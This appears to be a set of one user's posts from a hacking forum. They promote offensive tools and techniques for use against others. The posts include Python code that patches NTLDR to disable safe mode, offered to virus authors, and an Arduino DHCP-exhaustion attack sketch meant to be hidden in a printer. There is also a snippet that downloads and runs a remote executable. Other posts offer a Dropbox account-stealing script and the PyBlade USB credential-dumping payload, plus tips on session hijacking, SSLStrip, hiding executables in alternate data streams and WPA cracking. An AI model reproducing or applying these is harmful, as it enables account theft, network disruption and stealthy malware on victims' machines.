[The Attack Pre-Installed Environment]

are!

[The Attack Pre-Installed Environment]

@ibegreengoblin -- I sent you a PM, I'd also recommend modifying your post here to be a little less incriminating.

[Pyblade]

Glad to see the project is moving forward. May I humbly suggest adding this little script I wrote recently. Allows you to copy other people's dropbox accounts and maintain access to them even if they change their password. Perfect for flash drives/switchblades!

http://ge.tt/8nETsM5?c

And if you're feeling a bit evil, disable safe mode (XP/2k3):

# Python 2.x Code
import os
import mmap

def patchNtldr(ntldr = 'C:\\ntldr'):
    file = open(ntldr, 'r+')
    size = os.path.getsize(ntldr)
    map = mmap.mmap(file.fileno(), size)
    map.seek(1915)          # Jump to offset
    map.write_byte('\x90')  # NOP Sled, whee!
    map.write_byte('\x90')
    map.write_byte('\x90')
    map.close()

if __name__ == '__main__':
    patchNtldr()

[Cmd Access Remotely Accross Wlan?]

Meterpreter is good at this. -- http://lmgtfy.com/?q=meterpreter+tutorial

[The Most Evil Virus I've Seen Het]

Yeah that doesn't seem like a very mean virus. You can prbly just boot into safe mode and modify the Group Policies or regkeys to re-gain access.

On a side note to virus authors don't forget to disable safe mode by patching the NTLDR like so:

# Python 2.x Code
import os
import mmap

def patchNtldr(ntldr = 'C:\\ntldr'):
    file = open(ntldr, 'r+')
    size = os.path.getsize(ntldr)
    map = mmap.mmap(file.fileno(), size)
    map.seek(1915)          # Jump to offset
    map.write_byte('\x90')  # NOP Sled, whee!
    map.write_byte('\x90')
    map.write_byte('\x90')
    map.close()

if __name__ == '__main__':
    patchNtldr()

[Dhcp Exhuastion Issues?]

DHCP attacks are fun, I recently wrote a Arduino sketch to preform DHCP Exhaustion attacks on (ethernet) networks. Thinking about hiding in a network printer or something.

/*** 
 *    Net~nade: The hand held DHCP grenade (exhaustion attack)
 *  Written by: Sablefoxx
 */
#include <Ethernet.h>
#include <EthernetDHCP.h>

/* Function Prototypes */
void requestIp(byte);
void displayMac(byte);
const char* addressToString(const uint8_t* ip);

/* Setup */
void setup()
{
  Serial.begin(9600);
}

/* Main Loop */
void loop()
{
  byte mac[6] = {0xDE, 0xAD, 0xBE, 0xEF, 0x01, 0x01};
  for(int hexFour = 0; hexFour < 256; ++hexFour)
  {
    for(int hexFive = 0; hexFive < 256; ++hexFive)
    {
      requestIp(mac);
      mac[5]++;
      hexFive++;
      EthernetDHCP.maintain();
    }
    mac[4]++;      // Incriment 4th hex value
    mac[5] = 0x01; // Reset 5th hex value
    hexFour++;     // Incriment count
  }
}

void requestIp(byte mac[])
{
  Serial.print("[*] Attempting to obtain DHCP lease...");
  EthernetDHCP.begin(mac);
  const byte* ip = EthernetDHCP.ipAddress();
  const byte* gateway = EthernetDHCP.gatewayIpAddress();
  Serial.println("got it!");

  Serial.print("[+] From ");
  Serial.print(addressToString(gateway));
  Serial.print(" got ");
  Serial.print(addressToString(ip));
  Serial.print(" with ");
  displayMac(mac);
  Serial.print("\n");
}

void displayMac(byte mac[])
{
  for(int index; index <= 5; ++index)
  {
    Serial.print(mac[index], HEX);
    if(index < 5)
    {
      Serial.print(":");
    }
  }
}

const char* addressToString(const uint8_t* ip)
{
  static char buf[16];
  sprintf(buf, "%d.%d.%d.%d\0", ip[0], ip[1], ip[2], ip[3]);
  return buf;
}

[I Need Help With Python ...]

You shouldn't make system calls if possible (they're evil), it's actually easy to download files in pure python.

Heres a quick example;

import urllib

from subprocess import Popen

path = 'C:\\file.exe'                      # Local path
url = 'http://remote-server.com/file.exe'  # Remote path

connection = urllib.urlopen(url)
remoteFile = connection.read()
connection.close()

try:
    localFile = open(path, 'w')
    localFile.write(remoteFile)
    localFile.close()
    Popen(path) # Execute whatever "path" points to
except IOError:
    print '***** OMFG ERROR: Location is not writable %s *****\n' % path

Using sys.argv you can even make the 'url' a command line argument.

[Pyblade]

I haven't had much time to develop Py~Blade recently so here is the current source code, it's got a few bugs but feel free to hack it up. This isn't an official release but feel free to post patches, or any cool modifications you guys make. I'll get around to writing some more stuff in the summer (hopefully).

(Go forth and learn python! http://docs.python.org)

http://dl.dropbox.com/u/341940/pyblade.tar.gz

[Remove Cdfs Of Sandisk Cruzer Usb]

http://www.instructables.com/id/Remove-U3-from-flash-drive/

[Firesheep]

Note: a lot of the time even when the credentials are sent over HTTPS the cookie is still sent in clear text, so you can still use session hijacking. This is why this type of attack is effective, even if you can't get the user/password you can still gain access to an account.

[Firesheep]

It would be interesting to see someone writing an exploit that could tell this function in NoScript to disable HTTPS.

If you could write an exploit to do this you'd already have code running on the machine, which would make it pointless to disable HTTPS because you already owned the box, just hook the encryption dll.

[Firesheep]

1. Facebook sends the cookie in clear-text even if you login via SSL.

2. Gmail is now only done over SSL, no custom settings required, which mitigates this attack somewhat (certain other Google apps are not done over SSL though), but you can just use SSLStrip get around that

Also look into using Hamster/Ferret it can attack all sites and not just a predefined list (and almost as easy to use)

[Pyblade]

I'm hoping not to have to use AV-Kill and instead just hide everything. Killing process is messy and loud and I'd rather focus on stealth. I'm currently looking into hiding executable files in alternate data streams. For those of you who aren't familiar with alternate data streams they work like so;

E:\>touch test.txt

E:\>echo hello world >> test.txt

E:\>cat test.txt
hello world

E:\>dir test.txt
 Volume in drive E is RAID_ARRAY
 Volume Serial Number is 0000-0000

 Directory of E:\

10/20/2010  10:35 AM                14 test.txt
               1 File(s)             14 bytes
               0 Dir(s)  7,143,783,653,376 bytes free

E:\>touch test.txt:hidden.txt

E:\>echo this is the hidden file >> test.txt:hidden.txt

E:\>dir test.txt
 Volume in drive E is RAID_ARRAY
 Volume Serial Number is 0000-0000

 Directory of E:\

10/20/2010  10:36 AM                14 test.txt
               1 File(s)             14 bytes
               0 Dir(s)  7,143,783,653,376 bytes free

E:\>cat test.txt
hello world

E:\>cat test.txt:hidden.txt
this is the hidden file

E:\>

Notice the file size does not change and the file isn't listed using 'dir' and cannot be viewed by enabling hidden/system file viewing. :)

[Pyblade]

(Sorry about the long update interval recently moved 1,784 miles to attend college)

Lots of new features in the upcoming build, plus made the code a lot more modular so it will be easier for kids to play with. No AV kill in the new build at this time, but I will look into the Metasploit kill scripts, thx for the tip.

[Pyblade]

Soon, very soon.

[Payloads]

None that I am aware of, I've posted the source for all of my payloads but others do not. Contacting the author of the payload is your best bet to getting a copy of the source code, if it is not publicly available.

[Nice Security, But Not When You Forget The Password]

http://www.wpacracker.com/ (supports .zip files)

[Wpa Psk Hastables]

The website works by using a very large CPU cluster (400 to be exact) to run dictionary attacks against the WPA handshake. Since he is not using rainbow tables (a.k.a. hash tables/time memory trade-off) the salted keys aren't a problem.

[Wpa Psk Hastables]

WPA keys are salted based on the SSID of the access point. All of these tables are based on common SSIDs, so if you have a target in mind you may save a lot of time using; http://www.wpacracker.com/ (which will work on any SSID)

If the access point does have a common SSID you'll want to make sure its included with the tables you download.

[Hacking Tools]

Firefox (or any web browser for that matter)

[Pyblade]

thanx for tut , but can put file PyBlade on partition "CDFS" and save log on Another Partition , I thing that best because if put file on CDFS cant delete file and the antivirus not scan

and give me some explain about payloads file emo.exe,ftp_exec.exe etc.. what can I do for that

A modified U3 payload is on the way, w1ldf1re is help'in with that.

[Pyblade]

hey could you change it so that when you set it to save as shtml in the blade.conf to actually save the logs as .html instead of .log?

Fixed in version 0.3 ;) -- also note its now just 'text' 'html' or 'xml' instead of 'stext', 'shtml' or 'sxml'

[Pyblade]

From what I now...

-Install F_Bex.u3p opening the U3 menu of an UNMODIFIED Sandisk Cruzer.

-Open the menu...install apps...from Hdd...

and a small icon will appear on the avalaible apps...

My Problem

Couldn't find the "sniffing" log !

:)

Make sure you also copy the PyBlade files onto the flash partition of the drive. 'FBex' merely finds bex.exe and executes it. You can also set FBex to start automatically when the drive is inserted via the U3 menu.

I'm writing up some full documentation it'll be out soon, also w1ldf1re is working on a (modified) U3 version.

[Pyblade]

Ohh, okay. Yeah sounds like pwdump failed to launch for some reason... hrm.

[Pyblade]

Each time you run bex.exe it should create a new directory called X:\logs\COMPUTERNAME and will generate a set of logs for that computer. If a new directory does not exist there was a problem executing the payload(s).

(if you're looking in X:\logs\VM then you're looking at the log files from the virtual machine I test stuff on which doesn't have any passwords nor programs installed on it)

(in the examples above 'x:' would be your flash drive)